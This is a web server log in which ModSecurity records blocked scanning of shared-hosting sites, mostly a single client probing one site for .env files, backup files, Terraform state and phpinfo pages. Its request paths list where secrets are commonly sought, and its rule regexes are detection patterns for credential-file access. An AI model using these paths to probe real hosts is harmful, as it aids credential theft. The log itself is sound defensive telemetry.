[Tue May 26 15:15:38.310707 2026] [security2:error] [pid 700087:tid 700310] [client 195.178.110.199:37282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nodeweb/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAngAAAF0"]
[Tue May 26 15:15:38.317793 2026] [security2:error] [pid 700087:tid 700254] [client 203.109.114.58:2160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.114.109.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "masonicarkfoundation.in"] [uri "/xmlrpc.php"] [unique_id "ahVrwpPHQM4as9fEIIaAigAAACU"]
[Tue May 26 15:15:38.317903 2026] [security2:error] [pid 700087:tid 700254] [client 203.109.114.58:2160] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "masonicarkfoundation.in"] [uri "/xmlrpc.php"] [unique_id "ahVrwpPHQM4as9fEIIaAigAAACU"]
[Tue May 26 15:15:38.337423 2026] [security2:error] [pid 700087:tid 700338] [client 195.178.110.199:37344] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/old/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAoAAAAHk"]
[Tue May 26 15:15:38.423889 2026] [security2:error] [pid 700087:tid 700316] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/opt/.env"] [unique_id "ahVrwpPHQM4as9fEIIaApwAAAGM"]
[Tue May 26 15:15:38.798400 2026] [security2:error] [pid 700087:tid 700226] [client 195.178.110.199:37282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/php-info.php"] [unique_id "ahVrwpPHQM4as9fEIIaAwAAAAAk"]
[Tue May 26 15:15:38.821937 2026] [security2:error] [pid 700087:tid 700284] [client 195.178.110.199:60278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/php.php"] [unique_id "ahVrwpPHQM4as9fEIIaAxAAAAEM"]
[Tue May 26 15:15:38.992736 2026] [security2:error] [pid 700087:tid 700306] [client 195.178.110.199:60242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/product/.env"] [unique_id "ahVrwpPHQM4as9fEIIaAzAAAAFk"]
[Tue May 26 15:15:39.073251 2026] [security2:error] [pid 700087:tid 700222] [client 195.178.110.199:60228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/php_info.php"] [unique_id "ahVrw5PHQM4as9fEIIaAzwAAAAU"]
[Tue May 26 15:15:39.082668 2026] [security2:error] [pid 700087:tid 700260] [client 195.178.110.199:60356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVrw5PHQM4as9fEIIaA0QAAACs"]
[Tue May 26 15:15:39.084086 2026] [security2:error] [pid 700087:tid 700333] [client 185.191.171.4:28842] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-29-august-2/day/2024-10-03/"] [unique_id "ahVrw5PHQM4as9fEIIaA0gAAAHQ"]
[Tue May 26 15:15:39.084245 2026] [security2:error] [pid 700087:tid 700333] [client 185.191.171.4:28842] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-29-august-2/day/2024-10-03/"] [unique_id "ahVrw5PHQM4as9fEIIaA0gAAAHQ"]
[Tue May 26 15:15:39.106373 2026] [security2:error] [pid 700087:tid 700298] [client 195.178.110.199:60322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/portal/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA0wAAAFE"]
[Tue May 26 15:15:39.107992 2026] [security2:error] [pid 700087:tid 700305] [client 195.178.110.199:60258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/project/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA1AAAAFg"]
[Tue May 26 15:15:39.142317 2026] [security2:error] [pid 700087:tid 700341] [client 195.178.110.199:60176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/prod/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA3QAAAHw"]
[Tue May 26 15:15:39.209649 2026] [security2:error] [pid 700087:tid 700251] [client 195.178.110.199:60192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public-api/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA4AAAACI"]
[Tue May 26 15:15:39.211700 2026] [security2:error] [pid 700087:tid 700243] [client 195.178.110.199:60336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA4QAAABo"]
[Tue May 26 15:15:39.227481 2026] [security2:error] [pid 700087:tid 700343] [client 195.178.110.199:60292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/public/phpinfo.php"] [unique_id "ahVrw5PHQM4as9fEIIaA5AAAAH4"]
[Tue May 26 15:15:39.258543 2026] [security2:error] [pid 700087:tid 700310] [client 195.178.110.199:60224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public_html/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA6QAAAF0"]
[Tue May 26 15:15:39.413577 2026] [security2:error] [pid 700087:tid 700263] [client 195.178.110.199:60354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/production/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA8QAAAC4"]
[Tue May 26 15:15:39.649210 2026] [security2:error] [pid 700087:tid 700288] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrw5PHQM4as9fEIIaA5QAAAEc"]
[Tue May 26 15:15:39.670911 2026] [security2:error] [pid 700087:tid 700279] [client 195.178.110.199:60192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/qa/.env"] [unique_id "ahVrw5PHQM4as9fEIIaA_gAAAD4"]
[Tue May 26 15:15:40.054680 2026] [security2:error] [pid 700087:tid 700236] [client 195.178.110.199:60270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/s3/.env.bak"] [unique_id "ahVrxJPHQM4as9fEIIaBHgAAABM"]
[Tue May 26 15:15:40.113449 2026] [security2:error] [pid 700087:tid 700229] [client 15.235.196.76:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVrw5PHQM4as9fEIIaBFQAAAAw"]
[Tue May 26 15:15:40.198860 2026] [security2:error] [pid 700087:tid 700273] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBKQAAADg"]
[Tue May 26 15:15:40.210638 2026] [security2:error] [pid 700087:tid 700294] [client 195.178.110.199:60258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/api/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBKgAAAE0"]
[Tue May 26 15:15:40.403686 2026] [security2:error] [pid 700087:tid 700339] [client 195.178.110.199:60348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/backend/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBOwAAAHo"]
[Tue May 26 15:15:40.448295 2026] [security2:error] [pid 700087:tid 700269] [client 195.178.110.199:60354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBPwAAADQ"]
[Tue May 26 15:15:40.608545 2026] [security2:error] [pid 700087:tid 700281] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shared/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBTQAAAEA"]
[Tue May 26 15:15:40.619253 2026] [security2:error] [pid 700087:tid 700288] [client 195.178.110.199:60224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shop/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBTgAAAEc"]
[Tue May 26 15:15:40.712323 2026] [security2:error] [pid 700087:tid 700244] [client 195.178.110.199:60332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/service/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBVAAAABs"]
[Tue May 26 15:15:40.935806 2026] [security2:error] [pid 700087:tid 700344] [client 195.178.110.199:60208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stage/.env"] [unique_id "ahVrxJPHQM4as9fEIIaBZgAAAH8"]
[Tue May 26 15:15:41.043211 2026] [security2:error] [pid 700087:tid 700236] [client 195.178.110.199:60348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBcwAAABM"]
[Tue May 26 15:15:41.056833 2026] [security2:error] [pid 700087:tid 700282] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/srv/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBdgAAAEE"]
[Tue May 26 15:15:41.094908 2026] [security2:error] [pid 700087:tid 700260] [client 195.178.110.199:60332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/staging/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBdwAAACs"]
[Tue May 26 15:15:41.145308 2026] [security2:error] [pid 700087:tid 700305] [client 195.178.110.199:60216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stg/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBewAAAFg"]
[Tue May 26 15:15:41.386000 2026] [cgid:error] [pid 700087:tid 700313] [client 195.178.110.199:60336] AH01264: stderr from /home1/pronuyyv/public_html/sysinfo.cgi: script not found or unable to stat
[Tue May 26 15:15:41.403296 2026] [security2:error] [pid 700087:tid 700221] [client 195.178.110.199:60216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVrxZPHQM4as9fEIIaBnAAAAAQ"]
[Tue May 26 15:15:41.416854 2026] [security2:error] [pid 700087:tid 700232] [client 195.178.110.199:60176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBngAAAA8"]
[Tue May 26 15:15:41.472499 2026] [security2:error] [pid 700087:tid 700227] [client 195.178.110.199:60224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stripe/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBpQAAAAo"]
[Tue May 26 15:15:41.484524 2026] [security2:error] [pid 700087:tid 700248] [client 195.178.110.199:60332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/terraform.tfstate.backup"] [unique_id "ahVrxZPHQM4as9fEIIaBpgAAAB8"]
[Tue May 26 15:15:41.632639 2026] [security2:error] [pid 700087:tid 700322] [client 195.178.110.199:60270] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/user/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBsAAAAGk"]
[Tue May 26 15:15:41.672770 2026] [security2:error] [pid 700087:tid 700276] [client 195.178.110.199:60192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v1/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBswAAADs"]
